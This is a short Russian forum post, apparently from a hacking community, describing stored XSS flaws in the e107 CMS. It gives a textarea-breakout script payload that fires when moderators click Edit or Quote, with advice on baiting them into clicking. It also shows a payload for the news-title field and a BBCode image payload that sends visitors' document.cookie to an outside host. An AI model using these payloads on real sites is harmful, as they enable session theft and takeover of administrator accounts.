Хай! Вот выкладывал на одном форуме e107 HTML код, потом решил отредактировать, нажал, и увидел XSS :D При цитировании или редактировании сообщения, фильтрации нет :) Чё я имею в виду? Прём на e107 и пишем </textarea><script>alert()</script> и при нажатии на "Редактировать" или "Цитировать" выдаётся алерт, тоесть можно написать сообщение, и матернуться в нём, и админ или модер обязательно нжмут на "Редактировать" :D

Так же есть уязвимость в добавить новость при вставке в тема или заголовок (точно не помню как правильно ) <scrip*t>alert(*)</scrip*t> выдаётся алерт тестировалось на локалхосте с последней версией счкачаной вчера

HTML по дефолту разрешен админу. Обычным пользователям - нет. Потому на локалеке и катит.

вот ещё нашёл. правда же примитив? =)

[im*g]javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;[/im*g]